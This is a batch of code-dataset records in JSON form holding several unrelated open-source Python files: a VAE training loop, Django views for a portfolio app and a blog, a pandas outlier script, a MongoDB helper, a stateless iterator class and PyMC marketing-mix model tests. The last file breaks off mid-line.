save_filename)\n print('Saved as %s' % save_filename)\n\ntry:\n # set it so that the first one logs\n start_time = time.time()\n last_log_time = time.time() - log_every_n_seconds\n last_log_step = -log_every_n_steps - 1\n start_steps = vae.steps_seen\n for step in range(n_steps):\n input, target = random_training_set()\n optimizer.zero_grad()\n\n m, l, z, decoded = vae(input, target, temperature)\n if temperature > temperature_min:\n temperature -= temperature_dec\n\n ll_loss = criterion(decoded, target)\n #job.record(step, loss.data[0])\n\n KLD = -0.5 * (2 * l - torch.pow(m, 2) - torch.pow(torch.exp(l), 2) + 1)\n # ha bits , like free bits but over whole layer\n clamp_KLD = torch.clamp(KLD.mean(), min=habits_lambda).squeeze()\n #neg_KLD = -1 * clamp_KLD\n loss = ll_loss + clamp_KLD * kld_weight\n\n if step > kld_start_inc and kld_weight < kld_max:\n kld_weight += kld_inc\n\n loss.backward()\n # print('from', next(vae.parameters()).grad.data[0][0])\n ec = torch.nn.utils.clip_grad_norm(vae.parameters(), grad_clip)\n # print('to ', next(vae.parameters()).grad.data[0][0])\n optimizer.step()\n\n def log_and_generate(tag, value):\n if tag == \"step\":\n print('|%s|[%d] %.4f (k=%.4f, t=%.4f, kl=%.4f, ckl=%.4f, nll=%.4f, ec=%.4f)' % (\n tag, value, loss.data[0], kld_weight, temperature, KLD.data.mean(), clamp_KLD.data[0], ll_loss.data[0], ec\n ))\n elif tag == \"time\":\n print('|%s|[%.4f] %.4f (k=%.4f, t=%.4f, kl=%.4f, ckl=%.4f, nll=%.4f, ec=%.4f)' % (\n tag, value, loss.data[0], kld_weight, temperature, KLD.data.mean(), clamp_KLD.data[0], ll_loss.data[0], ec\n ))\n inp_str = long_word_tensor_to_string(input_side, input)\n print(' (input {}) \"{}\"'.format(tag, inp_str))\n target_str = long_word_tensor_to_string(output_side, target)\n if target_str.endswith(\"EOS \"):\n target_str = target_str[:-4]\n #from IPython import embed; embed(); raise ValueError()\n # flip it back\n print(' (target {}) \"{}\"'.format(tag, target_str[::-1]))\n generated = vae.decoder.generate(z, MAX_LENGTH, temperature)\n generated_str = float_word_tensor_to_string(output_side, generated)\n if generated_str.endswith(\"EOS \"):\n generated_str = generated_str[:-4]\n # flip it back\n print('(generated {}) \"{}\"'.format(tag, generated_str[::-1]))\n print('')\n\n if last_log_time <= time.time() - log_every_n_seconds:\n log_and_generate(\"time\", time.time() - start_time)\n last_log_time = time.time()\n\n if last_log_step <= step - log_every_n_steps:\n log_and_generate(\"step\", step)\n last_log_step = step\n\n if step > 0 and step % save_every == 0 or step == (n_steps - 1):\n vae.steps_seen = start_steps + step\n save()\n\n save()\n\nexcept KeyboardInterrupt as err:\n print(\"ERROR\", err)\n print(\"Saving before quit...\")\n save()\n\n", "repo_name": "sindhusweety/VAE-Generating-Sentences-From-a-Continuous-Space", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 7633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datasets.prepare_pair_data", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 62, "usage_type": "attribute"}, {"api_name": "cPickle.dump", "line_number": 64, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "2302794556", "text": "from django.shortcuts import render, get_object_or_404\nfrom .models import Security,Description\nfrom .forms import SearchForm,RebalanceForm,SecurityForm,DescriptionForm,Des_updateForm\n\n\n\n#index.htmlのページに対応\ndef index(request):\n searchForm = SearchForm(request.GET)\n if searchForm.is_valid():\n keyword = searchForm.cleaned_data['keyword']\n securities = Security.objects.filter(asset__contains=keyword)\n else:\n searchForm = SearchForm()\n securities = Security.objects.all()\n context = {\n 'securities':securities,\n 'searchform':searchForm,\n }\n return render(request, 'port/index.html',context)\n\n\n#detail.htmlのページに対応\ndef detail(request,id):\n security = get_object_or_404(Security, pk=id)\n #Securityモデルに対応するDescriptionモデルのデータベースを自動生成\n try:\n description = Description.objects.get(name_id=id)\n except Description.DoesNotExist:\n descriptionForm = DescriptionForm({'name':id})\n description = descriptionForm.save()\n context = {\n 'security':security,\n 'description':description,\n }\n return render(request, 'port/detail.html',context)\n\n\n#index.html >> Addボタン >> new.htmlに対応\ndef new(request):\n securityForm = SecurityForm()\n context = {\n 'message':'Add a New Security',\n 'securityForm':securityForm,\n }\n return render(request, 'port/new.html',context)\n\n#new.htmlのフォームから入力を受け、実際にSecurityモデルにデータを追加\ndef create(request):\n if request.method == 'POST':\n securityForm = SecurityForm(request.POST)\n if securityForm.is_valid():\n security=securityForm.save()\n context = {\n 'security': security,\n }\n #create URLでも、index.htmlを表示できるようindexファンクションの構成を付記。\n #Create後のurlを直接indexビューにするのがベストだが、、、、\n searchForm = SearchForm(request.GET)\n if searchForm.is_valid():\n keyword = searchForm.cleaned_data['keyword']\n securities = Security.objects.filter(asset__contains=keyword)\n else:\n searchForm = SearchForm()\n securities = Security.objects.all()\n context = {\n 'securities':securities,\n 'searchform':searchForm,\n }\n return render(request, 'port/index.html', context)\n\n\n#detail.html >> Rebalanceボタン >> edit.htmlに対応\ndef edit(request,id):\n security = get_object_or_404(Security, pk=id)\n rebalanceForm = RebalanceForm(instance=security)\n context = {\n 'message':'Rebalance a Position',\n 'security':security,\n 'rebalanceForm':rebalanceForm,\n }\n return render(request, 'port/edit.html',context)\n\n#edit.htmlのフォームから入力を受け、実際にSecurityモデルのデータを編集\ndef update(request,id):\n if request.method == 'POST':\n security = get_object_or_404(Security, pk=id)\n rebalanceForm = RebalanceForm(request.POST, instance=security)\n if rebalanceForm.is_valid():\n rebalanceForm.save()\n try:\n description = Description.objects.get(name_id=id)\n except Description.DoesNotExist:\n description = None\n context = {\n 'security':security,\n 'description':description,\n }\n return render(request, 'port/detail.html',context)\n\n\n#detail.html >> Removeボタン >> confirm_delete.htmlに対応\ndef confirm_delete(request,id):\n security = get_object_or_404(Security, pk=id)\n context ={\n 'security':security,\n }\n return render(request, 'port/confirm_delete.html',context)\n\n#confirm_delete.htmlの入力を受けて実際にecurityモデルからデータを消去\ndef delete(request,id):\n security = get_object_or_404(Security, pk=id)\n security.delete()\n securities = Security.objects.all()\n context = {\n 'message':'Delete Security ' + str(id),\n 'securities':securities,\n }\n return render(request, 'port/index.html',context)\n\n\n#detail.html >> Edit Description Infoリンク >> des_edit.htmlに対応\ndef des_edit(request,id):\n security = get_object_or_404(Description,name_id=id)\n des_updateForm = Des_updateForm(instance=security)\n if des_updateForm.is_valid():\n des_updateForm.save()\n context = {\n 'message':'Edit Description info',\n 'security':security,\n 'des_updateForm':des_updateForm,\n }\n return render(request, 'port/des_edit.html',context)\n\n#des_edit.htmlの入力を受け、実際にDescriptionモデルのデータを編集\ndef des_update(request,id):\n if request.method == 'POST':\n security = get_object_or_404(Security, pk=id)\n description = get_object_or_404(Description,name_id=id)\n des_updateForm = Des_updateForm(request.POST,instance=description)\n if des_updateForm.is_valid():\n des_updateForm.save()\n context = {\n 'description':description,\n 'security':security,\n 'des_updateForm':des_updateForm,\n }\n return render(request,'port/detail.html',context)\n", "repo_name": "na2me/PORT", "sub_path": "port/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "forms.SearchForm", "line_number": 9, "usage_type": "call"}, {"api_name": "models.Security.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 12, "usage_type": "name"}, {"api_name": "forms.SearchForm", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Security.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 25, "usage_type": "argument"}, {"api_name": "models.Description.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Description.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Description.DoesNotExist", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.DescriptionForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.SecurityForm", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 46, "usage_type": "call"}, {"api_name": "forms.SecurityForm", "line_number": 51, "usage_type": "call"}, {"api_name": "forms.SearchForm", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Security.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 62, "usage_type": "name"}, {"api_name": "forms.SearchForm", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Security.objects.all", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 65, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 75, "usage_type": "argument"}, {"api_name": "forms.RebalanceForm", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 87, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 87, "usage_type": "argument"}, {"api_name": "forms.RebalanceForm", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Description.objects.get", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Description.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Description.DoesNotExist", "line_number": 93, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 104, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 108, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 112, "usage_type": "argument"}, {"api_name": "models.Security.objects.all", "line_number": 114, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 114, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 114, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Description", "line_number": 124, "usage_type": "argument"}, {"api_name": "forms.Des_updateForm", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 138, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Description", "line_number": 139, "usage_type": "argument"}, {"api_name": "forms.Des_updateForm", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "74573588618", "text": "import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ntrain = pd.read_csv('N:/train.csv')\r\ntest = pd.read_csv('N:/test.csv')\r\n\r\nfig = plt.figure()\r\nsns.boxplot(x='Survived', y='Age', hue='Pclass', data=train)\r\n\r\ntrain2 = train.dropna()\r\n\r\nperAge = np.percentile(train2['Age'],[0,25,50,75,100])\r\nIQR = perAge[3]-perAge[1]\r\nupperAge = perAge[3]+IQR*1.5\r\nlowerAge = perAge[1]-IQR*1.5\r\nprint(train2.loc[(train2['Age'] > upperAge) | (train2['Age'] < lowerAge), 'Age'])\r\n#outliers identified with age>upper or age upperAge) | (train3['Age'] < lowerAge), 'Age'])\r\n#here we use 1.5 IQR to examine the outliers", "repo_name": "TingeOGinge/big_data", "sub_path": "week-3/pandasOutlier.py", "file_name": "pandasOutlier.py", "file_ext": "py", "file_size_in_byte": 941, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "71056818059", "text": "# coding=utf-8\n\n\"\"\"\n负责进行云音乐的数据库相关操作\n\nCreated by jayvee on 16/12/24.\n\"\"\"\nfrom utils.db_utils import get_db_inst\nfrom utils.logger_utils import data_process_logger\n\n\nclass CloudMusicDAO:\n def __init__(self, db_name, collection_name):\n self.db_name = db_name\n self.collection_name = collection_name\n self.db_inst = get_db_inst(self.db_name, self.collection_name)\n\n def save_unique_item(self, data_obj, primary_key='userId', is_overwrite=False, is_inform=False):\n \"\"\"\n 存储数据对象,并避免重复存储\n Args:\n data_obj:\n primary_key:\n is_overwrite:\n\n Returns:\n\n \"\"\"\n find_result = self.db_inst.find_one({primary_key: data_obj[primary_key]}, {primary_key: 1})\n # is_exist = user_dbinst.find({'userId': userinfo['userId']}).count() != 0\n # print find_result.count()\n\n if not find_result:\n self.db_inst.insert(data_obj)\n elif is_overwrite:\n self.db_inst.update({primary_key: data_obj[primary_key]}, data_obj)\n if is_inform:\n data_process_logger.warn(\n 'overwrite item %s in %s' % (data_obj[primary_key], self.collection_name))\n else:\n if is_inform:\n data_process_logger.warn(\n 'Item %s exist! in %s' % (data_obj[primary_key], self.collection_name))\n", "repo_name": "JayveeHe/MusicTaster", "sub_path": "utils/cloudmusic_dao.py", "file_name": "cloudmusic_dao.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "46", "api": [{"api_name": "utils.db_utils.get_db_inst", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger.warn", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.logger_utils.data_process_logger.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "10302615068", "text": "from django.contrib.syndication.views import Feed\nfrom django.core import serializers\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.db.models import Count\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_list_or_404\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\nfrom .models import Post\nfrom .templatetags.markdownify import markdown\n\n\ndef home(request):\n if request.user.is_authenticated:\n posts = Post.objects.all()\n else:\n posts = Post.published.all()\n\n paginator = Paginator(posts, 5)\n page = request.GET.get(\"page\")\n\n try:\n post_list = paginator.page(page)\n except PageNotAnInteger:\n post_list = paginator.page(1)\n except EmptyPage:\n post_list = paginator.paginator(paginator.num_pages)\n return render(request, \"home.html\", {\"post_list\": post_list})\n\n\ndef similar_posts_by_tag(request, tag_slug, pk):\n post = Post.objects.get(pk=pk)\n post_tags_ids = post.tags.values_list(\"id\", flat=True)\n if request.user.is_authenticated:\n similar_posts = Post.objects.filter(tags__in=post_tags_ids).exclude(\n id=post.id\n )\n similar_posts = similar_posts.annotate(\n same_tags=Count(\"tags\")\n ).order_by(\"-same_tags\", \"-publish\")[:4]\n else:\n similar_posts = Post.published.filter(tags__in=post_tags_ids).exclude(\n id=post.id\n )\n similar_posts = similar_posts.annotate(\n same_tags=Count(\"tags\")\n ).order_by(\"-same_tags\", \"-publish\")[:4]\n return render(request, \"tag.html\", {\"post_list\": similar_posts})\n\n\ndef detail(request, slug):\n post = Post.objects.get(slug=slug)\n tags = post.tags.all()\n return render(request, \"post.html\", {\"post\": post, \"tags\": tags})\n\n\ndef about(request):\n return render(request, \"about.html\")\n\n\ndef archives(request):\n if request.user.is_authenticated:\n post_list = Post.objects.all()\n else:\n post_list = Post.published.all()\n return render(\n request, \"archives.html\", {\"post_list\": post_list, \"error\": False}\n )\n\n\ndef blog_search(request):\n if \"search\" in request.GET:\n search = request.GET[\"search\"]\n if not search:\n return render(request, \"home.html\")\n else:\n post_list = get_list_or_404(\n Post.objects.filter(title__icontains=search)\n )\n if len(post_list) == 0:\n return render(\n request,\n \"archives.html\",\n {\"post_list\": post_list, \"error\": True},\n )\n else:\n return render(\n request,\n \"archvies.html\",\n {\"post_list\": post_list, \"error\": False},\n )\n return redirect(\"/\")\n\n\nclass RSSFeed(Feed):\n title = \"RSS feed - Articles\"\n link = \"/feeds/posts/\"\n description = \"RSS feed - Blog Posts\"\n\n def items(self):\n return get_list_or_404(Post.published.all())\n\n def items_title(self, item):\n return item.title\n\n def item_pubdate(self, item):\n return item.created_at\n\n def item_description(self, item):\n return markdown(item.content)\n", "repo_name": "andreztz/django-blog", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": "models.Post.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "models.Post.published.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 20, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 22, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 27, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Post.published.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 55, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Post.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "models.Post.published.all", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 68, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 68, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.get_list_or_404", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 81, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 90, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 98, "usage_type": "name"}, {"api_name": "django.shortcuts.get_list_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Post.published.all", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 104, "usage_type": "name"}, {"api_name": "templatetags.markdownify.markdown", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "34546285792", "text": "from typing import Callable, Generator, Generic, List, Optional, Tuple, TypeVar\n\nYields = TypeVar(\"Yields\", contravariant=True)\nSends = TypeVar(\"Sends\", contravariant=True)\n\n\nclass StatelessIterator(Generic[Yields, Sends]):\n def __init__(\n self,\n generator: Callable[[], Generator[Yields, Sends, None]],\n inputs: Optional[List[Sends]] = None,\n ):\n self.generator = generator\n self.inputs = inputs or []\n\n def send(self, x: Sends) -> Tuple[Yields, \"StatelessIterator[Yields, Sends]\"]:\n it = self.generator()\n inputs = self.inputs\n next(it)\n for inp in inputs:\n it.send(inp)\n y: Yields = it.send(x)\n it2 = StatelessIterator(self.generator, inputs + [x])\n return y, it2\n\n def __next__(self) -> Tuple[Yields, \"StatelessIterator[Yields, Sends]\"]:\n it = self.generator()\n assert not self.inputs\n y: Yields = next(it)\n it2: StatelessIterator[Yields, Sends] = StatelessIterator(self.generator, [])\n return y, it2\n", "repo_name": "ethanabrooks/pytypeclass", "sub_path": "pytypeclass/stateless_iterator.py", "file_name": "stateless_iterator.py", "file_ext": "py", "file_size_in_byte": 1047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "typing.TypeVar", "line_number": 3, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 4, "usage_type": "call"}, {"api_name": "typing.Generic", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "31099430020", "text": "from typing import List, Optional\n\nimport arviz as az\nimport numpy as np\nimport pandas as pd\nimport pymc as pm\nimport pytest\n\nfrom pymc_marketing.mmm.delayed_saturated_mmm import DelayedSaturatedMMM\n\nseed: int = sum(map(ord, \"pymc_marketing\"))\nrng: np.random.Generator = np.random.default_rng(seed=seed)\n\n\n@pytest.fixture(scope=\"class\")\ndef toy_df() -> pd.DataFrame:\n date_data: pd.DatetimeIndex = pd.date_range(\n start=\"2019-06-01\", end=\"2021-12-31\", freq=\"W-MON\"\n )\n\n n: int = date_data.size\n\n return pd.DataFrame(\n data={\n \"date\": date_data,\n \"y\": rng.integers(low=0, high=100, size=n),\n \"channel_1\": rng.integers(low=0, high=400, size=n),\n \"channel_2\": rng.integers(low=0, high=50, size=n),\n \"control_1\": rng.gamma(shape=1000, scale=500, size=n),\n \"control_2\": rng.gamma(shape=100, scale=5, size=n),\n \"other_column_1\": rng.integers(low=0, high=100, size=n),\n \"other_column_2\": rng.normal(loc=0, scale=1, size=n),\n }\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef mmm(toy_df: pd.DataFrame) -> DelayedSaturatedMMM:\n return DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef mmm_fitted(mmm: DelayedSaturatedMMM) -> DelayedSaturatedMMM:\n mmm.fit(target_accept=0.8, draws=3, chains=2)\n return mmm\n\n\nclass TestMMM:\n @pytest.mark.parametrize(\n argnames=\"adstock_max_lag\",\n argvalues=[1, 4],\n ids=[\"adstock_max_lag=1\", \"adstock_max_lag=4\"],\n )\n @pytest.mark.parametrize(\n argnames=\"control_columns\",\n argvalues=[None, [\"control_1\"], [\"control_1\", \"control_2\"]],\n ids=[\"no_control\", \"one_control\", \"two_controls\"],\n )\n @pytest.mark.parametrize(\n argnames=\"channel_columns\",\n argvalues=[\n ([\"channel_1\"]),\n ([\"channel_1\", \"channel_2\"]),\n ],\n ids=[\n \"single_channel\",\n \"multiple_channel\",\n ],\n )\n @pytest.mark.parametrize(\n argnames=\"yearly_seasonality\",\n argvalues=[None, 2],\n ids=[\"no_yearly_seasonality\", \"yearly_seasonality\"],\n )\n def test_init(\n self,\n toy_df: pd.DataFrame,\n yearly_seasonality: Optional[int],\n channel_columns: List[str],\n control_columns: List[str],\n adstock_max_lag: int,\n ) -> None:\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=channel_columns,\n control_columns=control_columns,\n adstock_max_lag=adstock_max_lag,\n yearly_seasonality=yearly_seasonality,\n )\n\n n_channel: int = len(mmm.channel_columns)\n samples: int = 3\n\n with mmm.model:\n prior_predictive: az.InferenceData = pm.sample_prior_predictive(\n samples=samples, random_seed=rng\n )\n\n assert (\n az.extract(\n prior_predictive, group=\"prior\", var_names=[\"intercept\"], combined=True\n )\n .to_numpy()\n .size\n == samples\n )\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"beta_channel\"],\n combined=True,\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n assert az.extract(\n data=prior_predictive, group=\"prior\", var_names=[\"alpha\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n assert az.extract(\n data=prior_predictive, group=\"prior\", var_names=[\"lam\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n\n if control_columns is not None:\n n_control = len(control_columns)\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"gamma_control\"],\n combined=True,\n ).to_numpy().shape == (\n n_control,\n samples,\n )\n if yearly_seasonality is not None:\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"gamma_fourier\"],\n combined=True,\n ).to_numpy().shape == (\n 2 * yearly_seasonality,\n samples,\n )\n\n def test_fit(self, toy_df: pd.DataFrame) -> None:\n draws: int = 100\n chains: int = 2\n\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n adstock_max_lag=2,\n yearly_seasonality=2,\n )\n n_channel: int = len(mmm.channel_columns)\n n_control: int = len(mmm.control_columns)\n fourier_terms: int = 2 * mmm.yearly_seasonality\n\n mmm.fit(target_accept=0.81, draws=draws, chains=chains, random_seed=rng)\n idata: az.InferenceData = mmm.fit_result\n assert (\n az.extract(data=idata, var_names=[\"intercept\"], combined=True)\n .to_numpy()\n .size\n == draws * chains\n )\n assert az.extract(\n data=idata, var_names=[\"beta_channel\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"alpha\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"lam\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"gamma_control\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n draws * chains,\n )\n\n mean_model_contributions_ts = mmm.compute_mean_contributions_over_time(\n original_scale=True\n )\n assert mean_model_contributions_ts.shape == (\n toy_df.shape[0],\n n_channel + n_control + fourier_terms + 1,\n )\n assert 